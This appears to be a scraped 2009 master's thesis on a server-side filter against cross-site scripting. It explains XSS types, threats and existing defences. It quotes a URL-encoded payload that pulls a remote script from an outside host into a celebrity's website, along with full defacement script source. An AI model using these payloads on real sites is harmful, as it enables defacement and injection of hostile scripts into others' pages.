Post on 24-Jul-2020
transcript
SERVER SIDE API TO SECURE XSS
Thesis
Submitted in partial fulfillment of the requirements for the degree of
MASTER OF TECHNOLOGY in
COMPUTER SCIENCE & ENGINEERING - INFORMATION
SECURITY
by
KAMESH KUMAR BOGANATHAM
(07IS04F)
DEPARTMENT OF COMPUTER ENGINEERING
NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA
SURATHKAL, MANGALORE -575025
July, 2009
NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA, SURATHKAL ----------------------------------------------------------------------------------------------------
D E C L A R A T I O N
I hereby declare that the Report of the P.G. Project Work entitled “SERVER
SIDE API TO SECURE XSS” which is being submitted to National Institute of
Technology Karnataka Surathkal, for the award of degree of Master of Technology in
Computer Science and Engineering – Information Security in the Department of
Computer Engineering, is a bonafide report of the work carried out by me. The material
contained in this report has not been submitted to any university or Institution for the
award of any degree.
07IS04F, B KAMESH KUMAR
-----------------------------------------------------
(Register Number, Name and Signature of Student)
Department Computer Engineering
Place: NITK, SURATHKAL Date:
C E R T I F I C A T E
This is to certify that the P.G Project Work Report entitled “SERVER SIDE API TO
SECURE XSS” submitted by B KAMESH KUMAR (Reg.No. 07IS04F) as the record of
the work carried out by him, is accepted as the P.G Project Work Report Submission in
partial fulfillment of the requirements for the award of degree of Master of Technology in
Computer Science and Engineering – Information Security in the Department of
Computer Engineering, National Institute of Technology Karnataka, Surathkal.
External Guide
(Mr. Radhesh Mohandas )
Adjunct Faculty
Department of Computer Engineering
NITK Surathkal
Internal Guide
( Mr. Alwyn R Pais)
Senior Lecturer
Department of Computer Engineering
NITK Surathkal
Chairman- DPGC
DEDICATED TO
THEIR LORDSHIPS
SRI SRI RADHA VRINDAVANA CHANDRA
ACKNOWLEDGEMENTS
I take this opportunity to express my deepest gratitude and appreciation to all
those who have helped me directly or indirectly towards the successful completion of this
project.
First and foremost, I would like to express my sincere appreciation and gratitude
to my esteemed guides Mr. Radhesh Mohandas, Adjunct Faculty and Mr. Alwyn R
Pais, Senior Lecturer, Department of Computer Engineering, NITK Surathkal for their
insightful advice, encouragement, guidance, critics, and valuable suggestions throughout
the course of my project work. Without their continued support and interest, this thesis
would not have been the same as presented here.
I express my deep gratitude to Mr. K. Vinay Kumar, Asst. Professor and Head,
Department of Computer Engineering, National Institute of Technology Karnataka,
Surathkal for his constant co-operation, support and for providing necessary facilities
throughout the M.Tech program.
I would like to take this opportunity to express my thanks towards the teaching
and non- teaching staff in Department of Computer Engineering, NITK for their
invaluable help and support in these two years of my study. I am also grateful to all my
classmates for their help, encouragement and invaluable suggestions.
My special thanks to my parents, supporting family and friends who continuously
supported and encouraged me in every possible way for successful completion of this
thesis. I am forever indebted to you all.
B Kamesh Kumar
This Page is intentionally left blank
ABSTRACT
With Internet becoming ubiquitous in every aspect of our life, there is an increase in the
web applications providing day to day services like banking, shopping, mailing services, news
updates, etc. But most of these applications have vulnerabilities or security loopholes like Cross
site scripting (XSS), Cross-site request forgery (CSRF), SQL Injection which are being exploited
by the hackers for malicious purposes. Hence there is a need for API’s/automated security tools
to identify and/or prevent these vulnerabilities before the application goes live.
This work focuses on developing a server side API for Cross-site Scripting which
differentiates XSS attack from simple script. Thus novice users can enjoy the safe and better
experience of browsing without any surge of functionality, need of additional software or
configuration at browser side. Developing such API also reduces burden to web administrators to
safe guard their web applications from malignant XSS attacks.
Keywords: Web Applications, Cross-site Scripting (XSS), Cross-site Request forgery
(CSRF/XSRF), Server-side XSS Filter.
This Page is intentionally left blank
i
TABLE OF CONTENTS
Page No.
Title
Declaration
Certificate
Dedication
Acknowledgement
Abstract Table of contents i
List of figures iv
List of tables v
Nomenclature/Acronyms vi
Chapter I INTRODUCTION 1
1.1 Cross-site Scripting Attacks 2 1.2 Motivation 2 1.3 Organization of Thesis 3
Chapter II CROSS-SITE SCRIPTING 4
2.1 Introduction to Cross-site Scripting 4
2.2 A Basic Example 5
2.3 Malicious Code 5
2.4 Classification of Cross-site Scripting 9
2.4.1 Reflected XSS 9
2.4.2 Stored XSS 10
2.4.3 DOM – based XSS 10
2.5 Threats from Cross-site Scripting 11
ii
2.6 Cross-site Scripting and Phishing 12
2.6.1 Introduction to Phishing 12
2.6.2 Phishing Tricks 13
2.6.3 Cross-Site Scripting based Phishing Attack 14
2.7 Real World Examples 14
2.8 XSS Vs. CSRF 18
Chapter III EXISTING XSS DEFENSES 20
3.1 AntiSamy 21
3.2 The strip_tags() 24
3.3 PHP Input Filter 25
3.4 HTML_Safe/SafeHTML 25
3.5 Kses 26
3.6 htmLawed 28
3.7 Safe HTML Checker 28
3.8 HTML Purifier 29
3.9 Summary 29
Chapter IV PROBLEM STATEMENT 30
Chapter V DIFFERENTIATING XSS FROM SIMPLE SCRIPTS 31
Chapter VI IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS
39
6.1 Procedure 39
6.2 Implementation Details 40
6.3 Working of SecureXSS 41
6.4 Results 43
Chapter VII CONCLUSIONS 45
iii
REFERENCES 46
APPENDIX I OWASP The Ten Most Critical Web Application
Security Vulnerabilities
48
APPENDIX II Results of SecureXSS API 51
APPENDIX III Results of HTML Purifier 80
APPENDIX IV Simple HTML DOM Parser array 95
Resume (Bio-Data) 125
iv
LIST OF FIGURES
Fig. No. Descripton
Page No.
2.1 Sample PHP Code for Site Search Engines 6
2.2 Sample HTTP Response Page Containing the Tag 6
2.3 Cross-Site Scripting in Site Search Engines 7
2.4 Sample Malicious Code for Cookie Theft 7
2.5 An Attack Scenario of Cross-Site Scripting 8
2.6 Examples of Phishing Tricks 13
2.7 Cross-Site Scripting based Phishing Attack 15
2.8 Maria Sharapova’s Home Page 16
2.9 Defacement 18
6.1 Server-side XSS Filtering API 41
6.2 SecureXSS overhead 44
1 MITRE data on Top 10 web application vulnerabilities for 2006 48
v
LIST OF TABLES
Table No. Descripton
Page No.
3.1 Kses API’s 26
5.1 Tags and its attributes which are in favour of attackers 31
5.2 Extensions allowed 34
5.3 DOM Properties which will cause XSS attacks 37
6.1 SecureXSS timing test (overhead) results 43
1 OWASP Top 10 Web Application Vulnerabilities 49
2 Results of SecureXSS 51
3 Results of HTML Purifier 80
vi
Nomenclature/Acronyms
Notation Description
XSS Cross-site Scripting
OWASP Open Web Application Security Project
XSRF/CSRF Cross-site Request Forgery
PHP Hypertext Pre Processor
URL Uniform Resource Locator
URI Uniform Resource Identifier
HTML Hyper Text Markup Language
HTTP Hyper Text Transfer Protocol
This Page is intentionally left blank
1
CHAPTER 1
INTRODUCTION
With the proliferation of the Internet, there has been a surge in the web services being
offered by many corporations like e-banking, e-shopping, etc. As most of these applications are
not developed with best security practices, there is an increase in the malicious attacks against
these services, which exploits the vulnerabilities in these applications to acquire material gains or
to steal the credentials of the novice users who use these web services. This has resulted in more
research focus in this domain to create new tools and techniques to subvert these kinds of
attacks. There are many research groups in academics and industry working in this domain to
find out more secure programming practices and tools to identify the vulnerability of these
applications during development phase and attacks during the real time.
The OWASP Top 10 report [OWA] lists the following as the ten most critical web
application security vulnerabilities that are been exploited:
Cross Site Scripting (XSS)
Injection Flaws (SQL Injection, XPath Injection, LDAP Injection, etc)
Malicious File Execution
Insecure Direct Object Reference
Cross Site Request Forgery (CSRF)
Information Leakage and Improper Error Handling
Broken Authentication and Session Management
Insecure Cryptographic Storage
Insecure Communications
Failure to Restrict URL Access
In this work, we focused on Cross-site Scripting (XSS), which facilitates the hacker to
insert some malicious script to the web application that may cause any kind of harm to legitimate
user. In the process, we developed a server side XSS filtering API, which differentiates Potential
XSS attack from the simple XSS and strips it off. The main goal of this work is to provide a XSS
2
solution to web administrators to safe guard their applications from attackers, which results in
safe and better experience browsing to lame user without any surge in functionality.
1.1 Cross-site Scripting Attacks
Cross-site scripting attack method was first discussed in a CERT advisory back in 2000
[CER]. But, even today cross-site scripting (XSS) is one of the most common vulnerabilities in
web applications. It happens as a result of insufficient filtration of data received from a malicious
person and then sent to third parties. Systems that receive data from users and display it on other
users' browsers are very vulnerable to an XSS attack. Wikis, forums, chats, web mail - are all
good examples of applications most susceptible to XSS.
Cross-site scripting (XSS) can be defined as a security exploit in which an attacker inserts
malicious code into a page returned by a web server trusted by a user. This code may reside on
the web server or be explicitly inserted when the user browses to the particular web site, it may
contain JavaScript or just HTML, and it may use third party sites as sources or rely only upon the
resources of the targeted server. The XSS attacks typically involve JavaScript code from a
malicious web server executing on a user's web browser. Chapter 2 gives the brief knowledge
about XSS attack and its types with examples and illustration.
1.2 Motivation
In the last years, dynamic Web applications such as online banking systems and online
shops are becoming more and more popular. At the same time, security attacks that exploit Web
application vulnerabilities are increasing dramatically. Among such vulnerabilities, Cross-Site
Scripting is the most common security issue (as it is already said, it is the top most vulnerability
as per OWASP 2007 report), which enables attackers to steal credentials from a victim to gather
sensitive information or cause a Web site to be unavailable. To mitigate such serious impact,
Web applications should use an effective solution for Cross-Site Scripting flaws. Manual
security testing (for mitigation) is however both expensive and error prone due to the increasing
complexity of Web applications. Hence, automated tools for detecting Cross-Site Scripting flaws
are essential.
3
We have investigated some available solutions which claim to be state-of-the-art.
Unfortunately, most of them are not effective solutions as they fail in differentiating simple
scripts from potential XSS attack. Therefore, we have developed SecureXSS (pronounce as
Secure Excess), an open-source server-side filter for detecting and filtering Cross-Site Scripting
vulnerabilities in Web applications.
1.3 Organization of Thesis
The rest of the thesis is organized as follows. Chapter 2 gives the brief information about
XSS attack and its types with live examples and illustration. Chapter 3 deals with the available
solutions for XSS, while Chapter 4 describes the problem statement. Chapter 5 details our
solution to mitigate XSS which is called SecureXSS: Server-side XSS Filter. Chapter 6 gives the
implementation details and experimental results and Chapter 7 concludes the thesis along with
the future work, followed by the references used. Appendix I details the Top 10 most critical web
application vulnerabilities. Appendix II shows the results of SecureXSS API, while Appendix III
shows results of HTML Purifier and Appendix IV shows the Simple HTML DOM Parser Array.
4
CHAPTER 2
CROSS-SITE SCRIPTING
Cross-Site Scripting vulnerabilities are quite widespread. Just taking a look at the
Bugtraq mailing list, innumerable postings alarming Cross-Site Scripting holes are listed
regularly. As mentioned in the introduction chapter, Cross-Site Scripting vulnerabilities are the
most common security loopholes found in over 80 percent of Web sites. Hence, the likelihood
that a Web site is XSS vulnerable is extremely high. According to the Information-Technology
Promotion Agency (IPA), from July 2004 to September 2005, attacks using Cross-Site Scripting
are the most serious issue among all Web application attacks (was accounted for 42%), while
SQL Injection is ranked second with 16%. Thus, it is imperative to make Web applications
secure against XSS attacks.
In this chapter, we start by briefly explaining the XSS problem with a basic example, and
then we give an introduction to malicious code and how XSS attacks work. After presenting the
classification of XSS, we describe the risks that XSS may cause.
2.1 Introduction to Cross-site Scripting
As introduced in the previous chapter, Web applications are becoming not only
increasingly popular, but also more and more vulnerable. Attack techniques exploiting various
types of Web application vulnerabilities are becoming more and more sophisticated. A particular
class of these attack techniques is referred to as Cross-Site Scripting (or HTML Code Injection),
which takes advantage of the failure of Web applications, that do not validate user input before
displaying it back to the user. Such attacks involve commonly three parties: the user (victim), the
attacker, and the website, which is XSS vulnerable. The attacker uses the poorly designed
legitimate website as a vehicle to execute malicious code (as it was originated from a trusted
source) in the user’s browser.
As explained above, XSS attacks occur when an attacker uses a web application to send
malicious code (generally in the form of a browser side script,) to a different end user. Flaws that
allow these attacks to succeed are quite widespread and occur anywhere in a web application, it
5
uses input given by user in the output it generates, without validating or encoding it. An attacker
can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no
way to know that the script should not be trusted, and will execute the script. Because it thinks
the script came from a trusted source and have the malicious script can access cookies, session
tokens, or other sensitive information retained by your browser and used with that site. These
scripts can even rewrite the content of the HTML page [XSS].
2.2 A Basic Example
Most web applications contain site search engines. Such site search engines usually
display the results on the screen together with the search phrase entered by users. As an example
consider the PHP code shown in figure 2.1, in which the text after “Search results for” is
generated dynamically according to the user input. When the search phrase (user input) is not
sanitized properly, Cross-Site Scripting may occur which can also be an attack. As illustrated in
figure 2.3 (a), after clicking on the search button, we get the search phrase entered in the form
field (here search text) displayed in the response page, regardless of the search results. We
experiment now with HTML tags, as illustrated in figure 2.3 (b), the search phrase returned (here
Hello World) is formatted as bold, instead of displaying the text we entered (Hello World
embedded in the HTML tag ). Besides displaying the formatted search phrase, we can also
cause JavaScript code to be executed in the browser (most browsers enabled JavaScript by
default). As illustrated in figure 2.3 (c), in place of showing the search phrase, a JavaScript alert
box with the text XSS Vulnerability popped up. It is for the reason that browser interprets the
search phrase we entered as HTML tag instead of text. In the sample HTTP response page shown
in figure 2.2, the tag introduces a JavaScript program and thus it is not displayed by
the browser.
2.3 Malicious Code
Considering the example above, one may ask, it just throws up an alert box, how dangerous can
it be? Right, alert pop ups are annoying; however they do not really cause security issues. We
just use it to demonstrate that a Web application is vulnerable to XSS. If the JavaScript alert
function can be executed, there is commonly no reason that other JavaScript functions containing
malicious code cannot succeed.
6
Figure 2.1: Sample PHP Code for Site Search Engines
Figure 2.2: Sample HTTP Response Page Containing the Tag
(a) Search for a Simple Text
(b) Search for a Formatted Text
7
(c) Search for an Executable Script
Figure 2.3: Cross-Site Scripting in Site Search Engines
Attackers exploit XSS vulnerabilities in order to execute the injected malicious code.
What on earth does malicious code mean? Which impact may it cause? Next, we will give an
introduction to malicious code.
Most Web browsers are able to run scripts embedded in Web pages downloaded from a
Web server by default. Such scripts are usually written in various scripting languages such as
JavaScript and VBScript, which are introduced by the HTML scripting tag . In
addition to the scripting tags, many other HTML tags (like tag) can be misused to load
malicious code.
Malicious code is able to rewrite an HTML page with fraudulent content, or redirect the
client’s browser to the page of attackers; it can even access authentication cookies, session
management tokens, or other sensitive information. With this information, an attacker is able to
hijack the victim’s active session and thus, bypass the authentication process completely.
Consider the script in figure 2.4, when this script is injected into a page of the site (e.g.
www.xss.site) successfully and a victim’s browser loads this page, the embedded script will be
executed and store the victim’s cookie from this site. Now, the attacker is able to access the
victim’s account and masquerade himself as the victim. (Figure 2.5 illustrates this scenario)
Figure 2.4: Sample Malicious Code for Cookie Theft
8
Figure 2.5: An Attack Scenario of Cross-Site Scripting
Steps shown in the Figure 2.5 is explained below in details.
(1) A user logs in a XSS vulnerable site.
(2) The site sets cookies (e.g. ID=123) to the user, which is saved in the browser.
(3) An attacker knows that the site displays a parameter without validating (e.g. the parameter
“name”), he constructs a link with the malicious code described in figure 2.4 and tricks the user
into clicking on this link.
(4) The unsuspecting user clicks on the link and an HTTP request containing the malicious code
from the attacker is sent to the XSS vulnerable site.
(5) According to the request, the site generates response page having malicious code embedded
and displays this page to the user.
9
(6) While user views the response page, the malicious code gets executed in the user’s browser,
cookies of that web site are sent to the attacker.
(7) The attacker has now access to the user’s account and can masquerade himself as the user.
The possible sources of malicious code include URL query string, HTML form fields,
HTTP headers and cookies, etc. Since malicious code is embedded in the user’s trusted websites,
it is allowed to perform dangerous operations smoothly. Websites using SSL are not more
protected against malicious code than those general websites. SSL only encrypts data (including
the malicious code) transmitted in the connection, it does not attempt to validate data. Therefore,
XSS attacks can be achieved as usual, except that they occur in an encrypted connection.
2.4 Classification of Cross-site Scripting
Generally, Cross-Site Scripting attacks can be classified into three categories: Reflected
(non-persistent), Stored (persistent) and DOM - based. Before we describe these three categories,
we should learn about DOM, to understand the third type of XSS.
The Document Object Model (DOM) is a cross-platform and language-independent
convention for representing and interacting with objects in HTML, XHTML and XML
documents. Objects under the DOM (also sometimes called "Elements") may be specified and
addressed according to the syntax and rules of the programming language used to manipulate
them. In simple terms, the Document Object Model is the way JavaScript sees its containing
HTML page and browser state. Next, we will describe these three categories respectively.
2.4.1 Reflected XSS
Reflected XSS (also referred to as non-persistent XSS) is by far the most common type,
which implicates that after a request, the page containing malicious code is returned to the Web
browser immediately.
Normally, a non-persistent XSS attack requires deceiving a user into visiting a specially
manipulated URL with embedded malicious code using social engineering techniques. When a
user is tricked into clicking on the malicious link, it causes the code embedded in the URL to be
executed in the Web browser, and the attack is achieved.
10
2.4.2 Stored XSS
In contrast to reflected XSS, stored XSS (also referred to as persistent XSS) implicates
that when the malicious code is injected to a website; it is stored (in a database or XML files)
over a longer period, and displayed to users in a webpage later. This kind of XSS is more serious
than other types, because an attacker can inject malicious code just once, and affect a large
number of unsuspecting users, it is even hardly necessary for attackers to trick the users into
clicking on a link containing malicious code. For example, if the malicious code is stored in a
database, without clicking on any link, the innocent user may become victim by just viewing the
page that contains the stored malicious code.
There is another kind of stored XSS that uses techniques to manipulate user’s cookies.
With such techniques, attackers are able to tamper the cookie content with malicious code and
cause the code to be executed each time when the user visits the website.
Examples of web applications, which are especially vulnerable by stored XSS, often
include discussion forums, guest books, webmail systems, etc. RSS feeds that are popularly used
in web blogs, news sites can also be used as vehicle to achieve such attacks.
Here is the real world example of a persistent XSS attack that occurred on the most
popular online auction website eBay. As reported by US-CERT16 in April 2006, when an eBay
user posts an auction, tags are allowed to be included in the auction description,
which creates a XSS vulnerability in the eBay Web site. Attackers are exploiting this
vulnerability to redirect auction viewers to a fake eBay login page that requests login information
to steal credentials [USC].
2.4.3 DOM – based XSS
Besides the XSS attacks described above, which are considered as standard XSS, there is
also a third kind of XSS attack, namely, DOM-based XSS. Unlike the standard XSS attacks,
which rely on the dynamic web pages, a DOM-based XSS attack does not require sending
malicious code to the server necessarily and thus can also use static HTML pages.
11
The problem is addressed in the client-side script (i.e. JavaScript) within a page itself,
which retrieves data from certain DOM objects without encoding the URL characters. The DOM
objects mentioned here include:
- document.location - document.URL - document.referrer
We make this clear by means of a simple example. Assuming that the following script
resides within a HTML page, this script displays the text retrieved from the current URL
somewhere in the page.
document.write(document.URL);
When we enter the following URL into the address bar in a browser, we will get an alarm
box with the text “XSS”, thus it results in XSS hole.
http://www.xss.site/index.html#alert("XSS")
2.5 Threats from Cross-site Scripting
Some of the common threats from XSS attacks are listed below:
Cookie theft and account hijacking: one of the most severe XSS attack involves cookie
theft and account hijacking as the scenario illustrated previously in figure 2.5. Credentials
stored in cookies can be stolen by attackers, thus it is possible for attackers to steal user’s
identity and access his confidential information. For normal users, this means that their
personal data such as credit card information or bank account may be misused. For users
having high privileges such as administrators, if their accounts are stolen via XSS,
attackers are able to access the web server and the backend database system, and thus
have the full control of the web application.
Misinformation: another critical threat from XSS is the danger of credentialed
misinformation. XSS attacks may include malicious code, which can spy on user’s surf
behavior and thus gain statistics (i.e. logging user’s clicks or history of sites visited).
Consequently, it results in loss of privacy. Another kind of misinformation is that
12
malicious code is able to modify the presentation of page content, once it is executed in a
browser. This enables an attacker to manipulate a press release or important news, even
to alter the stock price of companies, which results in loss of integrity. Malicious script
may also modify the login page, together with Phishing; a victim may submit his login
information to the attacker unconsciously.
Denial of Service: In view of an enterprise, it is imperative that their Web applications
are should be accessible all the time. However, malicious script can lead to loss of
availability. For example, it can redirect users’ browser to other websites. The spread of
the XSS worm on Myspace.com described previously is another example of a Denial of
Service attack. In view of users, malicious script can also make a user’s browser crash or
become inoperable (i.e. by throwing infinitely many alert boxes), so that the user cannot
reach the Web application any more.
Browser exploitation: malicious script can redirect client browsers to an attacker’s site,
so that the attacker is able to take advantage of specific security hole in web browsers to
control users’ computer by executing arbitrary commands, such as to install Trojan horse
programs on the client or upload local data containing sensitive information.
2.6 Cross-site Scripting and Phishing
This part of the thesis will give a brief explanation about phishing kind of cross site
scripting. Section 2.6.1 Will give introduction about phishing and Section 2.6.2 will explain some
tricks of the phishing, while Section 2.6.3 explains cross-site scripting based phishing attacks.
2.6.1 Introduction to Phishing
Phishing (as in fishing for sensitive data), is the act of tricking someone into giving them
sensitive information like credit card numbers, passwords, bank account information, or other
personal data using social engineering techniques [STA, OLL].
Phishing uses usually emails as medium, which look like coming from banks, ask users to
log into their online-banking system, or change their password, or input their credit card number.
In the last years, Phishing has become a major issue, according to the Pew Study [PEW], in
13
October 2005, more than a third of email users suffered Phishing, and two percent have
responded by providing personal financial information.
(a) Similar or Misspelled Domain Names
(b) URL Hex Encoding
(c) Using HTML Coding to Hide the Real Link
Figure 2.6: Examples of Phishing Tricks
2.6.2 Phishing Tricks
Tricks commonly used for Phishing include:
Similar or misspelled domain names (see figure 2.6(a)). Phisher’s may also substitute the
lowercase of “L” with the uppercase of “I”, because they are hard for the users to
distinguish.
Using encoded URL. These tricks are used to encode the URL to disguise its true value
by using Hex, Unicode, or UTF-8 encoding. An example of Hex Encoding is illustrated
in figure 2.6(b).
Using HTML coding to hide the real link (see figure 2.6(c)). The real link is not directly
visible to the user. As soon as he clicks the link, he is taken to the fake site of the attacker
instead of the site indicated.
Using fake banner advertising. Phisher’s can use copied banner advertising and publish it
on the Internet. Similar to the example above, the destination is linked to the fake site,
and it is not directly visible to the users.
14
2.6.3 Cross-Site Scripting based Phishing Attack
The Phishing tricks described above misdirect users to fake sites. But if the Phishing site
is the real site, this kind of Phishing attack is more dangerous, since users trust the real site. Such
attacks can be achieved, when a site is XSS vulnerable. The example below will demonstrate
sample of this attack.
For a Cross-site Scripting based Phishing attack; the following steps should be taken:
1. Finding Cross-site Scripting vulnerabilities in a site.
2. Embedding malicious content into a fraudulent email. Attacker could use encoded URL
to obfuscate the true destination.
3. Sending the spoofed email to victims.
When a user clicks the link in the spoofed email, the login part of the page returned is
replaced with the fake login page from the attacker’s site, other contents of the page and the
address bar remain unchanged. The user is not aware of this and logs in with his personal
information, which will be sent to the attacker. After login, the user will be redirected back to the
real site. Figure 2.7 illustrates this scenario.
XSS based Phishing attacks can bypass the traditional Phishing defenses such as
blacklists, SSL notices, etc. The first step to achieve XSS based Phishing attack is to find XSS
vulnerabilities in an insecure Web site.
2.7 Real World Examples
On April 1, 2007, there was an interesting prank on Maria Sharapova’s (the famous Tennis
player) home page (Figure 2.8). Apparently someone has identified an XSS vulnerability, which
was used to inform Maria’s fan club that she is quitting her carrier in Tennis to become a CISCO
CCIE Security Expert.
The URL that causes the XSS issue looks like the following:
15
http://www.mariasharapova.com/defaultflash.sps?page=//%20--
%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/scri
pt%3E%3C!--&pagenumber=1
Figure 2.7: Cross-Site Scripting based Phishing Attack
16
Notice that the actual XSS vulnerability affects the page GET parameter, which is also
URL-encoded. In its decoded form, the value of the page parameter looks like this:
// --> comments out everything
generated by the page up until that point. The second part of the payload includes a remote script
hosted at www.securitylab.ru. And finally, the last few characters on the URL make the rest of
the page disappear.
Figure 2.8 Maria Sharapova’s Home Page
The script hosted at SecurityLab has the following content:
document.write("Maria Sharapova"); document.write("Maria Sharapova is glad to announce you her new decision, which changes her all life for ever. Maria has decided to quit the carrier in Tennis and become a Security Expert. She already passed Cisco exams and now she has status of an official CCIE.
Maria is sure, her fans will understand her decision and will respect it. Maria already accepted proposal from DoD and will work for the US government. She also will help Cisco to investigate computer crimes and hunt hackers down.
17
Let’s have a look at the following example provided by RSnake from ha.ckers.org.
RSnake hosts a simple script (http://ha.ckers.org/weird/stallowned.js) that performs XSS
defacement on every page where it is included. The script is defined like this:
var title = "XSS Defacement"; var bgcolor = "#000000"; var image_url = "http://ha.ckers.org/images/stallowned.jpg"; var text = "This page has been Hacked!"; var font_color = "#FF0000"; deface(title, bgcolor, image_url, text, font_color); function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) { document.title = pageTitle; document.body.innerHTML = ''; document.bgColor = bgColor; var overLay = document.createElement("div"); overLay.style.textAlign = 'center'; document.body.appendChild(overLay); var txt = document.createElement("p"); txt.style.font = 'normal normal bold 36px Verdana'; txt.style.color = fontColor; txt.innerHTML = pageText; overLay.appendChild(txt); if (image_url != "") { var newImg = document.createElement("img"); newImg.setAttribute("border", '0'); newImg.setAttribute("src", imageUrl); overLay.appendChild(newImg); } var footer = document.createElement("p"); footer.style.font = 'italic normal normal 12px Arial'; footer.style.color = '#DDDDDD'; footer.innerHTML = title; overLay.appendChild(footer); }
In order to use the script we need to include it the same way we did when defacing Maria
Sharapova’s home page. In fact, we can apply the same trick again. The defacement URL is:
http://www.mariasharapova.com/defaultflash.sps?page=//%20--
%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script
%3E%3C!--&pagenumber=1
The result of the defacement is shown on Figure 2.9. Website defacement, XSS based or
not, is an effective mechanism for manipulating the masses and establishing political and non-
political points of view. Attackers can easily forge news items, reports, and important data by
using any of the XSS attacks. It takes only a few people to believe what they see in order to turn
something fake into something real.
18
Examples explained here are taken from [JEG], refer the same for many more real world
XSS attacks and examples.
Figure 2.9 Defacement
2.8 XSS Vs. CSRF
Cross-Site Scripting (XSS) and Cross-site Request Forgery (CSRF) attacks are frequently
confused as they are clearly related [RRO]. Both attacks are aimed at the user and often require
the victim to access a malicious web page. Also the potential consequences of the two attack
vectors can be similar: The attacker is able to submit certain actions to the vulnerable web
application using the victim's identity. The causes of the two attack classes are different though.
A web application that is vulnerable to XSS fails to properly sanitize user provided data before
including this data on a webpage, thus allowing an attacker to include malicious JavaScript in the
web application. This JavaScript consequently is executed by the victim's browser and initiates
the malicious requests. XSS attacks have more capabilities beyond the creation of http request
and are therefore more powerful than CSRF attacks. A rogue JavaScript has almost unlimited
power over the webpage it is embedded in and is able to communicate with the attacker. As an
example, XSS can obtain and leak sensitive information.
Cross Site Scripting (XSS) exploits the trust that a client has for the website or
application. Users generally trust that the content displayed in their browsers is same as that it is
19
intended to be displayed by the website being viewed. In contrast, CSRF exploits the trust that a
site has for the user. The website assumes that if an 'action request' was performed, it believes
that the request is being sent by the user [ROB].
An attacker exploits a lack of input and / or output filtering in the case of XSS flaw.
Filtering out the dangerous characters like , “, ‘, &, ;, or # in an application could resolve the
XSS flaw. XSS is related to the application performing insufficient data validation. XSS flaws
may allow bypassing of any CSRF protections by leaking valid values of the tokens, allowing
Referrer headers to appear to be an application itself, or by hosting hostile HTML and JavaScript
elements right in the target application. Therefore resolving XSS flaws should be given priority
over CSRF weaknesses [CSRF].
XSS aimed at inserting active code in an HTML document to either abuse client-side
active scripting holes, or to send privileged information (e.g. authentication/session cookies) to a
attacker controlled site. CSRF does not in any way rely on client-side active scripting, and its
aim is to take unwanted, unapproved actions on a site where the victim has some prior
relationship and authority.
Where XSS sought to steal the online trading cookies so an attacker could manipulate the
victim’s portfolio, CSRF seeks to use the victim’s cookies to force the victim to execute a trade
without his knowledge or consent.
20
CHAPTER 3
EXISTING XSS DEFENSES
There is dire need for web applications to provide users with the ability to format their
profile or postings using Hypertext Markup Language / Cascading Style Sheet (HTML/CSS). To
attain that functionality, developers must allow users to provide their own source code directly or
give the user an intermediate language with which the user can work.
As the simple solutions, there are many lightweight markup languages apart from HTML
available like BBCode [BBC], Wikitext [WIT], Markdown [MAD], Textile [TEX], WYSIWYG,
which will be parsed by message board system before being translated to markup language that
web browsers understand (can be HTML or XHTML).
An example intermediate language code for rendering green text can be shown below.
[color=green]Sample Text[/color]
After translation the above code would be rendered to the user’s browser in the target
language, HTML/CSS as seen below
Sample Text
This is a safe approach in general because it does not allow users to specify arbitrary
target language code which can be obfuscated and disguised using various encoding and
fragmenting techniques. By providing an intermediate language and interpreting it in a top-down
fashion the application can only render the subset of HTML functionality that they wish to
interpret.
There is a practical problem with this approach. The user will be fairly limited in
formatting code because of limited instruction set provided by the web application is unlikely to
ever be as complete as the HTML/CSS specifications. However the attributes/ values provided
with the attributes in any of these markup languages are not vulnerable, still they face problems
related to the way they translate the unknown markup language into secure HTML/XHTML (i.e.,
the translated HTML cannot be secure).
21
The other option when providing formatting capability is to allow users to input
HTML/CSS directly. If user’s input cannot be trusted, it is imperative that the application be able
to detect and remove any malicious code. To detect and remove such malicious code, there are
some solutions developed. In this Chapter we’ll see such solutions one by one in detail.
3.1 AntiSamy
The primary focus of developers while developing AntiSamy [ANT] (in reference to
Samy Kamkar’s now infamous MySpace XSS worm.) is to create a XSS filter that works on a
positive and customizable security model. The secondary focus was to make this tool as user
friendly as possible so as to allow applications using it to communicate to the user how their
input was filtered or how they could tune it themselves in order to accommodate a more
successful filter.
AntiSamy first sanitizes the user given input using NekoHTML to avoid false positives
because of unbalanced start or end markers. NekoHTML is a Java API that transforms unbroken
of any version into clean XHTML 1.0, which is also standalone of its kind.
The main validation processing takes place in a depth-first fashion. Starting with the root,
each node is processed according to the specifications inside the security model XML file given
with the node name (e.g., html or input). There are three modes of validation (also called
processing actions): filter, truncate and validate and they are each described in the following
section.
Filter
The filter processing action performs no validation per se, but only removes the start and
end tags, promoting the tag’s contents. This sanitization is useful in many cases. For example, if
you decided you wouldn’t like users to input meta tags that could mess with your robot indexing,
setting filter would have the effect demonstrated below.
User Input: This is some text.
Output after Filtering: This is some text.
22
Truncate
When the truncate processing action is set, no actual validation takes place. The truncate
action simply removes all the attributes and child nodes of a tag, making validation of its
attributes unnecessary. A number of tags should be set to truncate.
User Input:
Output after Truncating:
Many formatting tags are set to truncate in the default policy file, including em, small,
big, i, b, u, center, pre and more.
Validate
The validate processing action is where the meat of the filtering logic resides. If there are
no attributes defined for a tag by the policy file, the validate processing action will act the same
as the truncate processing action, except the child nodes will be validated instead of removed.
The validate action steps through each of the attributes in the tag to be filtered and checks
if there is a corresponding entry for that tag and attribute combination in the policy file. If no
entry is found, the attribute is simply removed. If there is an entry, the filter tries to validate its
value against the rules in the entry.
There are two ways for an attribute value to be validated; by being equal to a literal string
value or by the matching of a regular expression. Accordingly, each attribute’s definition in the
policy can have a list of valid literal strings and a list of regular expressions to match. This is a
departure from other XSS filters (and other security tools, in general) that don’t allow for
multiple ways to specify valid values, which force the user into writing overly complex (and
likely incomplete or unpredictable) regular expressions.
When an attribute does not pass a validation check, one of a few onInvalid actions is
taken. The possible onInvalid actions dictate what to do with the tag and its contents. The set of
23
onInvalid actions includes removeTag, filterTag and removeAttribute. The default action is
removeAttribute.
If an attribute with the removeTag set for its onInvalid action fails validation, the tag
